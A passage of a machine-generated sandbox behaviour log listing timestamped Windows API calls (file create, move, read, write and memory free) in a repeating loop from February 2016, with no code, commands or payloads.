"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,997", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,997", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,007", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,017", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,017", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,027", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,027", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,037", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,037", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,047", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,047", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,057", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,057", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,067", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,067", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,077", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,087", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,097", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,097", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,107", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,117", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,127", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,137", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,147", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,157", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,157", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,167", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,167", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,167", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,177", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,177", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,187", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,187", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,197", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,207", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,217", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,297", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,297", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,307", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,307", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,327", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,327", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,327", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,337", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,347", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,357", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,368", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,368", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,368", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,368", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,368", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,378", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,388", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,398", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,408", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,418", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,418", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,418", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,418", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,418", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,428", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,438", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,448", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,448", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,448", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,448", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,448", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,448", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,458", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,468", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,468", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtSetInformationFile"}, 